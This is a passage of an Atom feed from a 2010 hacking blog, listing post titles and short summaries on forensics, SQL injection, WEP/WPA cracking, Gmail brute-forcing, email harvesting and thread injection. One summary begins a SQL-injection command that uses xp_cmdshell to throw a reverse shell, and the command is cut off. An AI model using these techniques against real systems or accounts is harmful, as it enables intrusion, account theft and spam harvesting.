src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-827944672589475768</id><published>2010-08-15T20:45:00.002+08:00</published><updated>2011-06-20T00:27:53.547+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forensics'/><title type='text'>Honeynet  Memory Forensics Challenge</title><summary type='text'>The Honeynet project released a memory  forensics challenge a few months ago.  I read over the winning  three submissions and was very impressed with the creative solutions  they came up with.  The submitters used freeware tools and clearly spent  a significant amount of time putting their answers together.  
These  sort of academic challenges are fun and a great way to hone your skills.   In a </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/827944672589475768/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/honeynet-memory-forensics-challenge.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/827944672589475768'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/827944672589475768'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/honeynet-memory-forensics-challenge.html' title='Honeynet  Memory Forensics Challenge'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4014132050041526963</id><published>2010-08-15T19:47:00.001+08:00</published><updated>2010-08-15T19:52:34.793+08:00</updated><title type='text'>Jailbreak SSH horrors strike back</title><summary type='text'>Back in 2009 the “ikee”  rick-rolling worm went around the iPhone world via the password of  ‘alpine’ on the root account. You are now warned to change your root  password when you pop into Cydia and Rock the first time. But this thing  just wont stay down.
If you have jailbroken your iPad you might  want to check out a little file called “master.passwd”. In it, there is  another user called ‘</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4014132050041526963/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/jailbreak-ssh-horrors-strike-back.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4014132050041526963'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4014132050041526963'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/jailbreak-ssh-horrors-strike-back.html' title='Jailbreak SSH horrors strike back'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-377197380033575882</id><published>2010-08-13T03:29:00.001+08:00</published><updated>2011-06-21T00:56:03.196+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>In Defense of UAC</title><summary type='text'>This is me, editorializing - not an activity I prefer to use this blog  for. But occasionally something seems so nonsensical to me that I just  have to speak up. And today it's UAC that has me speaking up.
I'm  greatly disappointed by the number of true techies and semi-techies who  have gone into a sort of 'hate UAC' mode. I understand their  frustrations; UAC can slow down routine sysadmin </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/377197380033575882/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/in-defense-of-uac.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/377197380033575882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/377197380033575882'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/in-defense-of-uac.html' title='In Defense of UAC'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_rIh95t1bhWM/TGRKwThBvcI/AAAAAAAAAH0/xsc7WAWqU-A/s72-c/c0decstuff.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1140731472558376472</id><published>2010-08-13T03:21:00.003+08:00</published><updated>2010-08-13T03:22:06.997+08:00</updated><title type='text'>Don't cache 'negative' DNS lookups on Windows systems</title><summary type='text'>This one is a little bit esoteric. Scenario:
You try to connect to somesystem.yourdomain.com and fail - the name cannot be looked up. 
You discover that the DNS record is missing in your DNS server, and you fix it by adding the correct record. 
... but you still can't connect to somesystem.yourdomain.com from your workstation! 
What's  happening here is that your system has cached a 'negative </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1140731472558376472/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/dont-cache-negative-dns-lookups-on.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1140731472558376472'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1140731472558376472'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/dont-cache-negative-dns-lookups-on.html' title='Don&apos;t cache &apos;negative&apos; DNS lookups on Windows systems'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4543911797097487444</id><published>2010-08-12T15:28:00.002+08:00</published><updated>2011-06-21T00:54:10.051+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Improving HTTPS Side Channel Attacks</title><summary type='text'>In regards to the previous post and the impending Blackhat speech  with Josh Sokol, I thought I’d spend some time enumerating some of the  possibilities for reducing the chatter over SSL/TLS that the browser  introduces.  There are a few things that an attacker generally doesn’t  care about (not always, but generally).  
They generally don’t care about  images, CSS, JavaScript, favicons, and most </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4543911797097487444/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/improving-https-side-channel-attacks.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4543911797097487444'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4543911797097487444'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/improving-https-side-channel-attacks.html' title='Improving HTTPS Side Channel Attacks'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3075738629967664732</id><published>2010-08-12T15:26:00.002+08:00</published><updated>2011-06-21T00:54:38.747+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Side Channel Attacks in SSL</title><summary type='text'>For those of you who may not have seen it there is a very good paper  partially by Microsoft Research and partially by Indiana.edu called Side-Channel  Leaks in Web Applications: a Reality Today, a Challenge Tomorrow.    Initially it really upset me off that this paper was written, not  because it’s not excellent, but because it’s partially what I was going  to be speaking about at Blackhat.  
</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3075738629967664732/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/side-channel-attacks-in-ssl.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3075738629967664732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3075738629967664732'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/side-channel-attacks-in-ssl.html' title='Side Channel Attacks in SSL'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1924379272153048799</id><published>2010-08-11T17:19:00.000+08:00</published><updated>2010-08-11T17:19:45.943+08:00</updated><title type='text'>Remote Thread Execution in System Process using NtCreateThreadEx for Vista &amp; Windows7</title><summary type='text'>Contents
Introduction
Vista &amp; Session Separation
About NtCreateThreadEx Function
Executing Remote Thread into System Process using NtCreateThreadEx.
Limitations of NtCreateThreadEx Method
Alternative Techniques
Conclusion
References
Introduction
Windows provides an API function called CreateRemoteThread [Reference 2], which allows any process to execute a thread in the</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1924379272153048799/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/remote-thread-execution-in-system.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1924379272153048799'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1924379272153048799'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/08/remote-thread-execution-in-system.html' title='Remote Thread Execution in System Process using NtCreateThreadEx for Vista &amp; Windows7'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6188262675656564910</id><published>2010-06-22T22:10:00.002+08:00</published><updated>2011-06-21T22:50:54.966+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>Fierce Domain Scan</title><summary type='text'>Originally written by RSnake with input from id, Vacuum and Robert E Lee. A special thanks to IceShaman for porting it to use multi-threading and to Jabra for several patches and porting it into Backtrack 3.0. A huge thanks to Jabra for taking this to the next level with 2.x!
Fierce domain scan was born out of personal frustration after  performing a web application security audit.  It is </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6188262675656564910/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/fierce-domain-scan.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6188262675656564910'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6188262675656564910'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/fierce-domain-scan.html' title='Fierce Domain Scan'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2064927585672465331</id><published>2010-06-22T21:43:00.000+08:00</published><updated>2010-06-22T21:43:35.066+08:00</updated><title type='text'>Firefox DoS</title><summary type='text'>      With Blackhat impending, and given how many individual issues  I’ll be discussing, I thought I should start posting them here.  That  and the fact that I’m quickly approaching my 1000′th post (which, if I  have my way will be my last on ha.ckers.org) means that I need to start  wrapping up these issues into a neat little bow.  I have 43 more, as of  this post, so the clock is ticking.  
</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2064927585672465331/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/firefox-dos.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2064927585672465331'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2064927585672465331'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/firefox-dos.html' title='Firefox DoS'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-10945827311460166</id><published>2010-06-22T21:36:00.000+08:00</published><updated>2010-06-22T21:36:57.167+08:00</updated><title type='text'>Hardening HTAccess, Part One</title><summary type='text'>  Introduction

Htaccess can be used to manage multiple usernames/passwords, thereby enhancing information protection on the web server by controlling access through HTTP protocols. When used in conjunction with a browser encryption method such as SSL, it is possible to make htaccess authentication a robust method of protecting directories. However, out of the box, htaccess is prone to several </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/10945827311460166/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/hardening-htaccess-part-one.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/10945827311460166'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/10945827311460166'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/hardening-htaccess-part-one.html' title='Hardening HTAccess, Part One'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1205598816206797042</id><published>2010-06-08T00:43:00.003+08:00</published><updated>2010-06-08T16:58:26.991+08:00</updated><title type='text'>ONE CLICK OWNAGE</title><summary type='text'>ONE CLICK OWNAGEhttp://english.mavituna.com 
Idea of this attack is very simple. Getting a reverse shell from an SQL Injection with one request without using an extra channel such as TFTP, FTP to upload the initial payload.
For example the following text will throw a reverse shell to 192.168.0.1:1;exec master..xp_cmdshell 'echo 
try download link down for complate Similar attacks have been around</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1205598816206797042/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/one-click-ownage.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1205598816206797042'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1205598816206797042'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/06/one-click-ownage.html' title='ONE CLICK OWNAGE'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_rIh95t1bhWM/TA0fcHTI-xI/AAAAAAAAAHk/KyNTs4d-z68/s72-c/xx.GIF' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7405035507228256391</id><published>2010-05-30T08:31:00.000+08:00</published><updated>2010-05-30T08:31:57.716+08:00</updated><title type='text'>New search engine: heaven for skiddies</title><summary type='text'>There's a new search called SHODAN, which can look for servers, routers and printers using your search query, and get their response banners.

This is what you can search for:

    * country:2-letter country code
    * hostname:full or partial host name
    * net:IP range using CIDR notation (ex: 18.7.7.0/24 )
    * port:21, 22, 23 or 80
As you can see, anyone can easily find vulnerable hosts </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7405035507228256391/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/new-search-engine-heaven-for-skiddies.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7405035507228256391'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7405035507228256391'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/new-search-engine-heaven-for-skiddies.html' title='New search engine: heaven for skiddies'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8923874292137624412</id><published>2010-05-25T09:12:00.001+08:00</published><updated>2010-05-25T09:14:27.296+08:00</updated><title type='text'>Cracking Wep Wpa Wireless Network</title><summary type='text'>Covers wep &amp; wpa password/passphrase recovery using the aircrack-ng suite http://docs.alkaloid.net/index.php/Cracking_WEP_and_WPA_Wireless_Networks 
   </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8923874292137624412/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/cracking-wep-wpa-wireless-network.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8923874292137624412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8923874292137624412'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/cracking-wep-wpa-wireless-network.html' title='Cracking Wep Wpa Wireless Network'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3652880462133838077</id><published>2010-05-24T05:52:00.000+08:00</published><updated>2010-05-24T05:52:01.694+08:00</updated><title type='text'>ipv6hackit</title><summary type='text'>Managed by ipsecs.com. You may download all ipv6 hackit on core.ipsecs.com or the tarball version at ipv6hackit-v0.1.tar.gz</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3652880462133838077/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/ipv6hackit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3652880462133838077'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3652880462133838077'/><link rel='alternate' 
type='text/html' href='http://c0decstuff.blogspot.com/2010/05/ipv6hackit.html' title='ipv6hackit'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-562834782466943640</id><published>2010-05-10T09:21:00.008+08:00</published><updated>2011-06-21T00:53:03.927+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Aplication'/><title type='text'>PenTBox : simple n smart security tools</title><summary type='text'>  
Yes... simple, smart n powerfull... ;) not just push button hacker....PenTBox is a Security Suite with programs like Password Crackers, Denial of Service testing tools (DoS and DDoS), Secure Password Generators, Honeypots and much more. Destined to test security/stability of networks and more. Programmed in Ruby, and oriented to GNU/Linux systems (but compatible with Windows, MacOS and more).</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/562834782466943640/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/pentbox-simple-n-smart-security-tools.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/562834782466943640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/562834782466943640'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/pentbox-simple-n-smart-security-tools.html' title='PenTBox : simple n smart security tools'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_rIh95t1bhWM/S-cvR9Uf2gI/AAAAAAAAAGU/bKf02e7yONc/s72-c/logo2.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4315513263168992067</id><published>2010-05-08T18:02:00.005+08:00</published><updated>2010-05-08T18:22:31.951+08:00</updated><title type='text'>"The Finger Server" execute shell commands</title><summary type='text'>Vulnerability
  "The Finger Server"
Affected
"The Finger Server"
Description
Iain Wade found the following. In 1999 he was tinkering with The Finger Server v0.82 and came across some bugs which let you execute shell commands under the privileges of the web server. It's available at
glazed.org  It's just another case of perl doing it's magic on an open() call.There  is  undoubtably  </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4315513263168992067/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/finger-server-execute-shell-commands.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4315513263168992067'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4315513263168992067'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/finger-server-execute-shell-commands.html' title='&quot;The Finger Server&quot; execute shell commands'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2995321471211951527</id><published>2010-05-07T06:22:00.001+08:00</published><updated>2010-05-07T06:24:03.097+08:00</updated><title type='text'>Mail Crawler</title><summary type='text'>#!/usr/bin/perl
# emailzz.pl by TheLeader
# Searches Google and gathers e-mail addresses from search results
# Credit to Sro for the idea and the inspiration.. keep it up dude ^^
# http://forums.hacking.org.il/viewtopic.php?p=49414#49414

# When patterns are broken, new worlds emerge ~Tuli Kupferberg
# DISCLAIMER:
# Using this script may violate Google's Terms of Service.
# I take no </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2995321471211951527/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/mail-crawler.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2995321471211951527'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2995321471211951527'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/mail-crawler.html' title='Mail Crawler'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6004437311178417290</id><published>2010-05-05T04:41:00.004+08:00</published><updated>2010-05-05T04:51:14.409+08:00</updated><title type='text'>effective SQL Injection Tool (mysql&amp;mssql)</title><summary type='text'> This was several days I tried a source for penetration, and I think I can just incredible to thank my wisdom from evilzc0de&gt;black hat Indonesia&gt;jasakom.I just think this compilation has the structure of the algorithm and extraordinary at the time of inspection.we are all grateful for mywisdom open enough to share .hopefully continue to be developed!-----------------------------------------------</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6004437311178417290/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/effective-sql-injection-tool-mysql.html#comment-form' title='0 
Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6004437311178417290'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6004437311178417290'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/effective-sql-injection-tool-mysql.html' title='effective SQL Injection Tool (mysql&amp;mssql)'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_rIh95t1bhWM/S-CFcmQv63I/AAAAAAAAAGE/KJRJdcxW_Sg/s72-c/d1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4270805775850237283</id><published>2010-05-03T10:10:00.001+08:00</published><updated>2010-05-04T17:14:08.951+08:00</updated><title type='text'>HowTo: Windows XP VPN Into Remote Location</title><summary type='text'>This entry goes along with HowTo: Windows XP VPN Server Setup. Having a Secured VPN (Virtual Private Networking) server is great, especially for businesses with many offices or if you own two homes. How can you connect to these VPNs free? Well I will tell you. With Windows XP Networking you can connect to any VPN site for free and with ease. 
There is even a way to Automate the VPN connection on </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4270805775850237283/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/howto-windows-xp-vpn-into-remote.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4270805775850237283'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4270805775850237283'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2010/05/howto-windows-xp-vpn-into-remote.html' title='HowTo: Windows XP VPN Into Remote Location'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8932170243634028659</id><published>2010-05-02T23:56:00.001+08:00</published><updated>2010-05-02T23:58:13.390+08:00</updated><title type='text'>BruteMonkey Gmail Bruteforce/Dictionary Attack</title><summary type='text'> 
Disclaimer: This program is intended for educational purposes only. Please use on your OWN e-mail. The author of this program is not responsible for whatever possible trouble you get into. Use at own risk!

Intro:
